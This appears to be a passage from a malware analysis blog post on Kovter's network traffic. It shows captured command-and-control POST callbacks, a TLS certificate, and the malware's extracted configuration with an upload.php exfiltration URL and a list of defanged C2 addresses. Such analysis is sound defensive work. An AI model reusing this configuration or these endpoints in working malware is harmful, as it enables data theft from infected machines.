From the network side, the malware seems to be pretty straight forward. Once the files have been downloaded from the Powershell script and have been executed, we can see the POST callbacks to a couple of different IP addresses.
POST /checkupdate HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://194[.]31[.]59[.]5/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 194[.]31[.]59[.]5
Content-Length: 1103
Connection: Keep-Alive
ZZd=%CFi%0FG%D7j%A0%3A%B4%A8%0Bd%B8%B3nU%DE%8F%A3%BF%A9q%CF%84%3C%23%E4%21&uunC=%07AT%95w%25%CE%5C%A9%186%CD%C0%9E%5D%1E%8Es%B2%98%DDS%96%BDx%1F%0E%1E%C3%DF%3CI%DA%E6%9E%E5%01%CA%3E%1D%E9I%E07%2CN%90%83&rhjQSF=.%D60%D1%9At%9FC%E1%1FA%14%5D%ED%B0&IwVFWpRk=%FF9v%C5%D0%067%AB%A4kN%AD%F4%FA%18i&nFzv=1%90%0Ap%3Fw%14%85-%FB%BDg%95-%02%22&yndZOvyk=s%D4%FBK%9F%26%26%7Es%FA%89%0F%29G%AF%BD%1Fe%1F%F0%DBB%3F%C962%A9%D1%80e%7C&lWdL=%89%DE%1BG%07%EA%B8%F6Q%21%DEH%7D%9F%D6L%92%C1%A1%0AC%B1%23%7C%8B%83%BA%AD%EF%8C%D8%BA%19%0B%CBYyT%89%80&lIRiyP=%80%AD%90%CCI%E6%9CP%F5i%04Z%C1Lb%01y%C9%C0%3F2%25%D8D%E9%E2%86%2C%AAsg%EDI%CA%84T78%9F%AB%1B%A3%C4%EF%CD%21&IzGlUb=%A6Q%28%C7%5B9F%03%90%0E%C6%1C%E2%F1%F1%1Cr1M%7B%FF%13%8F%92%D5%3E%3CL%D8Y%BB%BF3%5D%7F%BD%ED%EDp%B3d%8C&dPz=%A4x%91o%D50%7D%26%99%01%F3%8En%B4%BB%90r%18%F1%93%16%BA%E7%FB%E2%97%95%8C%B8%1A%3E2+%DCS%E0%9B&tUNM=%BAYi%93%8D%C3%40%CA%7Cx%EEJa%D3U%95%2Fu%AD&LZNBvnt=%83f%27%29%0Ag%5D%1Dg%A5%DC%2C%C1%0C%3B%01%09%AC%D8%7F%3F%3C%B88f%E3%11%C0%60%CE%8D%9F0%95Pk%91&bNZLk=%8F%A8_%C6%D5%10%C2%91%E3%EA%9B%5EsH%C6CT%A7%00%7F&dItZlk=%B6%F7%8E%14%83%A9%83%B0%ABgM
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 03 Feb 2017 08:50:30 GMT
Content-Type: application/octet-stream
Content-Length: 373
Connection: keep-alive
Q"..<m..Xr5..g.MR.;...!....]...lu..B7.u.K.C....l&......zPl.Ve.....+.G......._....<...;E..${E.{Q .. .....0.zc...r.....P
.vy.j.qJ.L......@{,..A.'........Pj.f}3.=:......' 8........2.k..E.".m`..5r.... ..x.D..6F......D..I..W.....l.{. .2w^.C4X.P.;.PP^V7.y.N.....Z......T..]m....8...#..,.ho..)..$... ...y...3RH|#R.. @t......d.....Hr.]....H.th$..c.Yt.x^.$7}.?.Dg.-....tykf.......&
-----
/POST /checkupdate HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://194[.]31[.]59[.]5/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 194[.]31[.]59[.]5
Content-Length: 690
Connection: Keep-Alive
SIyTD=%3E%E9%90%D6%BAh-%93%60C%D5%FC%DA%7C%B9%00&SjAVD=%BE%21%D9s%B6%D8%13U%5C%B3%CC%B8S%F9%F9FXO%8E%076%C7&FqiGQdBN=%2F%88B%A4%D9lo%BA%D6%06%1ER%CC%16H%E0%2F%E3%A2%BE%91%2F%BB%3C%D8%AA%05%91%B3xy%F9%B1&cXlYLNr=%7C%CE%C0%C9%5E%C4%DByY%BC%B2%2B%9C%BC%8B%BA%E9V%D7%D7%7E%5B%F8g%063%3C%F6F%1B%40C9%F0%5CI&KXLjATwr=%18y%E0%1F4%A3%2A%DB%06%14%7C%B6t%AF%15g%F5%C2D%F5%F1%BAC%DE%0F%80B%CF%D8%FB%8F%1C%C4%92%19%D0&sEREwsM=%86C%E2%B6%95%F9%CEK%0B%1F%1FT%97%3D%FBb%5C%8B%27Vq%99%94%D03j%81%E1B%8F%1F2%0A%A3%D0SB%BD&TEZc=P%7E%D5%0F%D3%92%B3%17%96%0A%A9%00%94%AB%86%DFp%9B%D8%13%98%C6E%8A%0Eq%05%1E%BFw%E1%0A%D6%A9%D6%B3%F5&ahXmRSFz=%5E%C1mAf%1A%29%99%B6%E9%8C%D9%AA%0D%DB%1E%8A%5Dtg%B8%D37OS%C2%83%F7L
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 03 Feb 2017 08:50:31 GMT
Content-Type: application/octet-stream
Content-Length: 1074
Connection: keep-alive
...a.n...[p..........f....z.@]..(=.~...X..Y)c.......C.x.n]j.)..........\.......(..s.........K.N..:...Y.c..Y..e....F..3I.k.z.....~...
-----
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 128[.]1[.]191[.]207
Content-Length: 472
Cache-Control: no-cache
JmwW3JA7UCEHHPM2MrS0nEz+ws7Z4gp6fZB4a79ARwr7p25dRmYz3EJYxn7vHsYlIuXGtijSuctDBxhvdOGEME+lttPV5RM8+awTwL4orbm4RsuyxUnzbflw2D+TguM62A4mCVujKnO4jAMHXSJTCzDGEXJjnaAwuI5Cctd7db5OXwKIm2b8gDDaglUOE7Ndw4hA/WQomcVsIAYAFOLjrABReSiXQZB6reI+YpUfUGyFNMshy8tF4MD86Lrv6unosp1hQHdx3ojHO5B0d98TtSGOBViWWnmuGUo6GnIDOfF2Ge1cEgP3jUE9I+b5dWnMC4c+3vuF/5zOvr5cogaw4fx7LehP1os5sf7mpbSsi5mYWuqgxnES1Z6qk2OgPDLGq6OyZ+Qa4DaGM/nANLA3rNOvYO51WE7KdF8ze2AYgrE2NeO/+7AIhMIlXkStX5igAnd+ph9yYIWtm3dsY9Vl5w==
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Fri, 03 Feb 2017 08:50:55 GMT
Connection: close
Content-Length: 39
<h1>Bad Request (Invalid Hostname)</h1>
-----
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 104[.]247[.]149[.]240
Content-Length: 452
Cache-Control: no-cache
d25A25FqWGqzdkND5TCryGWbNsWcd08JBGFDNKTFfQ7K9hgM43RuwLkP+htLhcmMdwSS+VRtiDprb67iwET1c0zGXK8scYQGJ0ni289fcN52qe8FsyqHJnH7u3CAG6o3MzmJBIoILYnLUTKo0aEwH2R9PWE5gVrUjx8SjYaTnr0BJlvYKRNmUJpqVE/s6iK6UW9Xb0yrbrCw6Bc2jA+bNiN19F36G5MYISj1AkTn/TIz57THvT/R4YaHPHYPV+3TcsmZFpdup9KQ7AvAtksMNbOP5oMxLg8yAOx1hgkruEx7lt/9oSwCFLyQH9V6ZjZuObT4RFm8QZQSXyq19J8oJOajur2AyBE0XTymvyWRPvVpx3o8kaaurX04ChaZm3EdqLrchfJ58uROXM04MOkhln53WbcliGaK9BOXttqjWFUDmtdFho7lq91zW1A/8ghJxUE=
HTTP/1.1 301 Moved Permanently
Server: nginx/1.10.2
Date: Fri, 03 Feb 2017 08:50:58 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: http://devel[.]highproxies[.]com/
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.10.2</center>
</body>
</html>
It is here that we see a callback over HTTPS with a Let’sEncrypt SSL certificate:
........}..X.Ds7.?....zyf..r.....N:lR...tW...../.5...
..... .
.2.8.......<..............devel.highproxies.com..........
..................]...Y..X.Ds.M)F.Xl......08e-.`..F..i.6. ...a...<E@...h......E.."..>'.A`.......................... ... .. ....0...0...........%7..gN*8x........0
. *.H..
.....0J1.0 ..U....US1.0...U.
.
Let's Encrypt1#0!..U....Let's Encrypt Authority X30..
161230090800Z.
170330090800Z0 1.0...U....devel[.]highproxies[.]com0.."0
. *.H..
..........0..
.......O..M!...C<?;.>..........[.d....|..1....V.%x........C
-......../.af..b..._:.V.8W$.b.a.XX..C......I`.L~.'w....v.pY...9.Q.....V..?9..i.1...r.r.....P...0.*..('t...~.`......=..U.E....OK....9"r...........?!.J...O./Y...}.J....R....7&23.....|. 5I7.EkG.(R.O....Ri.........0...0...U...........0...U.%..0...+.........+.......0...U.......0.0...U......!1u......do..3...J..0...U.#..0....Jjc.}....9..Ee.....0p..+........d0b0/..+.....0..#http://ocsp.int-x3.letsencrypt.org/0/..+.....0..#http://cert.int-x3.letsencrypt.org/0 ..U....0...devel.highproxies.com0....U. ...0..0...g.....0....+..........0..0&..+.........http://cps.letsencrypt.org0....+.......0.....This Certificate may only be relied upon by Relying Parties and only in accordance with the Certificate Policy found at http://letsencrypt.org/repository/0
We can also see in Wireshark’s Conversations pane (see below) that there are attempts to talk to several IP addresses over port 8080 which failed since they never got a response (only 1 packet was sent).
While letting Process Explorer run while I was looking into the Process Monitor logs and other things, I kept seeing the “regsvr.exe” process (PID 1740) constantly connecting to different IP addresses and ports. Since the capture on Wireshark had already finished, I fired up another one and let it capture some of that traffic. This time around I got different IP addresses (except for the one that is using HTTPS), and also different IP addresses trying to talk to port 8080 (see the image below).
Seeing this, I used Strings2 to take a look into the regsvr.exe process to see if there was anything in there that may help give an idea of what the callbacks would be. Piping that out to a text file, I proceeded to look for keywords like “http” (3427 hits) and also “/upload.php” (17 hits). Those hits reflect the following IP addresses.
185[.]117[.]72[.]90 189[.]177[.]220[.]156
The interesting thing here is that there is a block of text that is found when you look for “/upload.php” in Notepad++ which contains 133 different IP addresses along with what, according to this article from PhishMe states, is the configuration file for Kovter along with the updates to patch the system to the latest versions of Flash and .Net Frameworks. **Note: I came across the PhishMe link when looking up the term “nonuldnet32” in Google.
cp1::150[.]219[.]156[.]87:80>59[.]34[.]180[.]235:38232>169[.]136[.]157[.]237:80>62[.]220[.]112[.]204:443>18[.]56[.]29[.]198:80>218[.]216[.]127[.]77:80>21[.]41[.]239[.]107:80>100[.]166[.]63[.]24:80>106[.]192[.]26[.]7:80>195[.]69[.]139[.]52:443>243[.]69[.]73[.]16:80>137[.]234[.]227[.]8:80>55[.]29[.]95[.]39:80>125[.]138[.]46[.]188:80>191[.]38[.]99[.]216:443>17[.]155[.]112[.]156:80>129[.]143[.]21[.]202:8080>32[.]84[.]137[.]4:443>191[.]59[.]120[.]31:80>255[.]155[.]235[.]46:80>141[.]236[.]125[.]239:80>169[.]1[.]96[.]26:443>48[.]155[.]43[.]68:443>202[.]100[.]184[.]83:80>20[.]19[.]162[.]140:80>3[.]140[.]205[.]238:80>37[.]123[.]165[.]161:443>106[.]74[.]107[.]202:80>8[.]249[.]254[.]51:80>99[.]252[.]161[.]28:80>9[.]48[.]98[.]170:80>147[.]173[.]72[.]96:443>1[.]132[.]22[.]166:443>129[.]16[.]111[.]236:80>210[.]243[.]212[.]209:8080>18[.]53[.]35[.]179:80>114[.]187[.]128[.]212:80>60[.]103[.]18[.]131:80>172[.]132[.]76[.]194:443>113[.]67[.]58[.]224:80>20[.]179[.]35[.]232:80>73[.]249[.]184[.]108:80>9[.]222[.]103[.]137:443>204[.]197[.]26[.]221:443>224[.]138[.]203[.]45:80>244[.]157[.]143[.]47:80>190[.]67[.]48[.]224:80>180[.]42[.]36[.]109:80>208[.]118[.]116[.]55:80>4[.]195[.]63[.]225:25900>32[.]107[.]214[.]76:80>203[.]233[.]71[.]250:443>6[.]61[.]150[.]230:80>75[.]16[.]138[.]183:80>90[.]45[.]25[.]145:443>63[.]149[.]238[.]126:80>249[.]158[.]225[.]208:80>156[.]211[.]224[.]150:43912>229[.]210[.]208[.]203:80>27[.]219[.]195[.]210:80>30[.]255[.]153[.]175:80>216[.]69[.]26[.]86:80>182[.]180[.]65[.]173:443>197[.]45[.]165[.]116:443>79[.]101[.]37[.]210:80>12[.]25[.]99[.]130:80>50[.]56[.]242[.]72:8080>187[.]108[.]195[.]8:8080>212[.]219[.]93[.]114:443>138[.]4[.]86[.]20:8080>132[.]247[.]145[.]147:443>209[.]159[.]149[.]156:443>202[.]191[.]121[.]100:443>20[.]243[.]155[.]227:443>53[.]128[.]177[.]21:8080>235[.]250[.]233[.]187:80>35[.]214[.]161[.]230:443>34[.]5[.]168[.]186:443>210[.]147[.]248[.]235:443>254[.]220[.]78[.]226:47857>130[.]99[.]108[.]151:443>87[.]145[.]98[.]19:80>133[.]232[.]247[.]107:80>25[.]111[.]58[.]211:80>13[.]102[.]27[.]247:80>205[.]246[.]43[.]28:80>229[.]157[.]60[.]81:8080>180[.]168[.]197[.]23:80>29[.]156[.]163[.]20:443>53[.]44[.]118[.]111:80>123[.]100[.]180[.]115:43893>129[.]105[.]221[.]156:443>194[.]58[.]126[.]20:80>50[.]188[.]52[.]73:80>80[.]228[.]26[.]99:80>143[.]97[.]189[.]141:32240>241[.]174[.]170[.]164:28721>20[.]129[.]203[.]86:80>6[.]211[.]88[.]116:80>20[.]168[.]78[.]137:80>163[.]91[.]30[.]241:27879>174[.]120[.]121[.]230:39788>39[.]144[.]13[.]86:80>142[.]34[.]249[.]209:443>204[.]42[.]154[.]209:80>66[.]32[.]198[.]58:80>105[.]149[.]112[.]90:80>238[.]9[.]247[.]103:80>141[.]127[.]109[.]227:35000>250[.]5[.]29[.]204:80>232[.]245[.]197[.]186:80>8[.]218[.]248[.]66:80>97[.]215[.]155[.]187:80>138[.]196[.]78[.]240:80>173[.]126[.]49[.]27:443>84[.]22[.]102[.]112:80>145[.]89[.]215[.]87:8080>10[.]94[.]237[.]3:80>25[.]100[.]119[.]180:443>206[.]63[.]226[.]28:80>149[.]201[.]173[.]198:80>15[.]26[.]248[.]116:8080>218[.]5[.]226[.]178:80>245[.]187[.]185[.]226:80>90[.]251[.]34[.]209:443>65[.]159[.]238[.]36:443>30[.]184[.]131[.]202:443>103[.]216[.]152[.]95:80>34[.]58[.]82[.]4:80>249[.]167[.]103[.]219:47074>192[.]214[.]135[.]145:80>199[.]48[.]116[.]234:80>163[.]109[.]92[.]34:42753> cp1cptm::30::cptmkey::a7887cc809cf0d4df17fc5dafd03e4e7::keypass::65537::20717578436666370206990156461786566788132748458910865354994919388630407187082788932551065567891365033974994995141358277530021944793516607142737605543772104350635734672485498640041982499636009940196953103877199811371834197299886690010229547993815721647414299018829914480336700775760032044922438942690008663278856440487164946050309668972730239620373400036156807226902415414689227139343695179004305146177952041410093920067335850237232148134221904306706694425837140102211178161590920721365317540938040383023194954613997204876850415109848188765254167924483000246775174171501733414326729845936854172715365200925796295269097::passdebug::0::debugelg::1::elgdl_sl::0::dl_slb_dll::0::b_dllnonul http://185[.]117[.]72[.]90/upload2[.]php nonuldnet32::http://download[.]microsoft[.]com/download/0/8/c/08c19fa4-4c4f-4ffb-9d6c-150906578c9e/NetFx20SP1_x86[.]exe dnet32dnet64::http://download[.]microsoft[.]com/download/9/8/6/98610406-c2b7-45a4-bdc3-9db1b1c5f7e2/NetFx20SP1_x64[.]exe dnet64pshellxp::http://download[.]microsoft[.]com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG[.]exe pshellxppshellvistax32::http://download[.]microsoft[.]com/download/A/7/5/A75BC017-63CE-47D6-8FA4-AFB5C21BAC54/Windows6[.]0-KB968930-x86[.]msu pshellvistax32pshellvistax64::http://download[.]microsoft[.]com/download/3/C/8/3C8CF51E-1D9D-4DAA-AAEA-5C48D1CD055C/Windows6[.]0-KB968930-x64[.]msu pshellvistax64pshell2k3x32::http://download[.]microsoft[.]com/download/1/1/7/117FB25C-BB2D-41E1-B01E-0FEB0BC72C30/WindowsServer2003-KB968930-x86-ENG[.]exe pshell2k3x32pshell2k3x64::http://download[.]microsoft[.]com/download/B/D/9/BD9BB1FF-6609-4B10-9334-6D0C58066AA7/WindowsServer2003-KB968930-x64-ENG[.]exe pshell2k3x64cl_fv::24::cl_fvfl_fu::http://fpdownload[.]macromedia[.]com/get/flashplayer/current/licensing/win/install_flash_player_24_active_x[.]exe fl_fumainanti::DD1D:1:DD1DDD2D:1:DD2DDD3D:1:DD3DDD4D:1:DD4DDD5D:0:DD5DDD6D:1:DD6DDD7D:1:DD7DDD8D:1:DD8DDD9D:1:DD9DDD10D:1:DD10DDD11D:0:DD11DDD12D:1:DD12DDD13D:1:DD13DDD14D:1:DD14DDD15D:1:DD15DDD16D:1:DD16DDD17D:0:DD17Dal:http://185[.]117[.]72[.]90/upload.php
And here is the IP addresses cleaned up from the list above. Please note that only a handful of the IP addresses used in the PCAPs are found in the list below:
150[.]219[.]156[.]87:80 59[.]34[.]180[.]235:38232 169[.]136[.]157[.]237:80 62[.]220[.]112[.]204:443 18[.]56[.]29[.]198:80 218[.]216[.]127[.]77:80 21[.]41[.]239[.]107:80 100[.]166[.]63[.]24:80 106[.]192[.]26[.]7:80 195[.]69[.]139[.]52:443 243[.]69[.]73[.]16:80 137[.]234[.]227[.]8:80 55[.]29[.]95[.]39:80 125[.]138[.]46[.]188:80 191[.]38[.]99[.]216:443 17[.]155[.]112[.]156:80 129[.]143[.]21[.]202:8080 32[.]84[.]137[.]4:443 191[.]59[.]120[.]31:80 255[.]155[.]235[.]46:80 141[.]236[.]125[.]239:80 169[.]1[.]96[.]26:443 48[.]155[.]43[.]68:443 202[.]100[.]184[.]83:80 20[.]19[.]162[.]140:80 3[.]140[.]205[.]238:80 37[.]123[.]165[.]161:443 106[.]74[.]107[.]202:80 8[.]249[.]254[.]51:80 99[.]252[.]161[.]28:80 9[.]48[.]98[.]170:80 147[.]173[.]72[.]96:443 1[.]132[.]22[.]166:443 129[.]16[.]111[.]236:80 210[.]243[.]212[.]209:8080 18[.]53[.]35[.]179:80 114[.]187[.]128[.]212:80 60[.]103[.]18[.]131:80 172[.]132[.]76[.]194:443 113[.]67[.]58[.]224:80 20[.]179[.]35[.]232:80 73[.]249[.]184[.]108:80 9[.]222[.]103[.]137:443 204[.]197[.]26[.]221:443 224[.]138[.]203[.]45:80 244[.]157[.]143[.]47:80 190[.]67[.]48[.]224:80 180[.]42[.]36[.]109:80 208[.]118[.]116[.]55:80 4[.]195[.]63[.]225:25900 32[.]107[.]214[.]76:80 203[.]233[.]71[.]250:443 6[.]61[.]150[.]230:80 75[.]16[.]138[.]183:80 90[.]45[.]25[.]145:443 63[.]149[.]238[.]126:80 249[.]158[.]225[.]208:80 156[.]211[.]224[.]150:43912 229[.]210[.]208[.]203:80 27[.]219[.]195[.]210:80 30[.]255[.]153[.]175:80 216[.]69[.]26[.]86:80 182[.]180[.]65[.]173:443 197[.]45[.]165[.]116:443 79[.]101[.]37[.]210:80 12[.]25[.]99[.]130:80 50[.]56[.]242[.]72:8080 187[.]108[.]195[.]8:8080 212[.]219[.]93[.]114:443 138[.]4[.]86[.]20:8080 132[.]247[.]145[.]147:443 209[.]159[.]149[.]156:443 202[.]191[.]121[.]100:443 20[.]243[.]155[.]227:443 53[.]128[.]177[.]21:8080 235[.]250[.]233[.]187:80 35[.]214[.]161[.]230:443 34[.]5[.]168[.]186:443 210[.]147[.]248[.]235:443 254[.]220[.]78[.]226:47857 130[.]99[.]108[.]151:443 87[.]145[.]98[.]19:80 133[.]232[.]247[.]107:80 25[.]111[.]58[.]211:80 13[.]102[.]27[.]247:80 205[.]246[.]43[.]28:80 229[.]157[.]60[.]81:8080 180[.]168[.]197[.]23:80 29[.]156[.]163[.]20:443 53[.]44[.]118[.]111:80 123[.]100[.]180[.]115:43893 129[.]105[.]221[.]156:443 194[.]58[.]126[.]20:80 50[.]188[.]52[.]73:80 80[.]228[.]26[.]99:80 143[.]97[.]189[.]141:32240 241[.]174[.]170[.]164:28721 20[.]129[.]203[.]86:80 6[.]211[.]88[.]116:80 20[.]168[.]78[.]137:80 163[.]91[.]30[.]241:27879 174[.]120[.]121[.]230:39788 39[.]144[.]13[.]86:80 142[.]34[.]249[.]209:443 204[.]42[.]154[.]209:80 66[.]32[.]198[.]58:80 105[.]149[.]112[.]90:80 238[.]9[.]247[.]103:80 141[.]127[.]109[.]227:35000 250[.]5[.]29[.]204:80 232[.]245[.]197[.]186:80 8[.]218[.]248[.]66:80 97[.]215[.]155[.]187:80 138[.]196[.]78[.]240:80 173[.]126[.]49[.]27:443 84[.]22[.]102[.]112:80 145[.]89[.]215[.]87:8080 10[.]94[.]237[.]3:80 25[.]100[.]119[.]180:443 206[.]63[.]226[.]28:80 149[.]201[.]173[.]198:80 15[.]26[.]248[.]116:8080 218[.]5[.]226[.]178:80 245[.]187[.]185[.]226:80 90[.]251[.]34[.]209:443 65[.]159[.]238[.]36:443 30[.]184[.]131[.]202:443 103[.]216[.]152[.]95:80 34[.]58[.]82[.]4:80 249[.]167[.]103[.]219:47074 192[.]214[.]135[.]145:80 199[.]48[.]116[.]234:80 163[.]109[.]92[.]34:42753